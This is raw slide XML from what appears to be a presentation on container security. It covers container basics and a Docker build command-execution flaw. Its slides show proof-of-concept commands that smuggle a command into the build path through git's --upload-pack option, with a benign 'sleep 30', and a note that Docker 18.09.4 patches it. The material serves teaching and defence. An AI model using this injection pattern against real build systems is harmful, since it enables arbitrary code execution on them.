          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>At Docker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2800" b="0" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whatever command is put into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--upload-pack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option will be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This vulnerability can be exploited by a local attacker who can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and can control the build path or a remote attacker who has the control over the build path.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="280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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EEF17D0-C5EC-F927-1DCD-47272295256E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3124200" y="2678728"/>
          <a:ext cx="6805246" cy="404446"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6805246">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3411197054"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="404446">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just" rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>docker build "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>git@g.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>/a/b#--upload-pack=sleep 30;:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="1F1F1F"/>
                        </a:highligh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1F1F"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3812579021"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9DA22E-073E-AFE6-96E6-7865FBC292C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3053862" y="3509901"/>
          <a:ext cx="5943600" cy="889000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5943600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="444689166"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="396532">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="-914400" algn="just" rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>$ git </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>init</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="1F1F1F"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="-914400" algn="just" rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>$ git remote add </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>git@g.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>/a/b</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="1F1F1F"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="-914400" algn="just" rtl="0" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>$ git fetch origin "--upload-pack=sleep 30; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>git@g.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="1F1F1F"/>
                          </a:highlight>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>/a/b”</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:highlight>
                          <a:srgbClr val="1F1F1F"/>
                        </a:highligh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1F1F"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2904834848"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278486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Docker build code execution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marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Launch the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="280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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7234F9-C7D0-C9E9-664D-695DAED29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445" y="2726106"/>
            <a:ext cx="79248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3582618F-C4AF-2EAA-E9B0-04083D44B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722" y="4136776"/>
            <a:ext cx="79248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3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Docker build code execution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a:xfrm>
            <a:off x="849406" y="1511860"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Launch the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="280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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36866" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369A7367-C81B-CDA2-DE12-E31858060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932" y="2076628"/>
            <a:ext cx="7505184" cy="442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6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B21D-7B6B-C88C-8274-C040BA060075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BFFB600-A7D0-8A28-FB83-8BE37A1F3211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>What are Containers? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2200"/>
              <a:t>A logical box with everything that the application needs: OS, runtime, system tools, libraries.. etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="2200" baseline="30000"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2200"/>
              <a:t>Less footprint than VMs. Share the host OS’s kernel. This leads to pros and cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Pros:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Lightweight &amp; portable: perfect for DevOps operations (i.e CI/CD, serverless, microservices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Cons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Shared-kernel model: vulnerable host =&gt; vulnerable container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Docker: Daemon-based, root-owned socket, single point of failure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(all operation go through this daemon)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E45E09-BA23-5A7A-3C88-360CAB4546FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6293309"/>
            <a:ext cx="10321159" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://k21academy.com/docker-kubernetes/what-are-containers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cheatsheetseries.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cheatsheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker_Security_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.researchgate.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/publication/316602321_Understanding_Container_Isolation_Mechanisms_for_Building_Security-Sensitive_Private_Cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D9C4B6-CDD7-83E6-5F89-5B72EC74E7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85253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b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mitigation</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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A patch was deployed with the release of Docker engine version 18.09.4. Keeping the docker engine up-to-date will mitigate the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-SA" sz="280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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4B809E-4BDA-52E0-8394-B6617F174135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
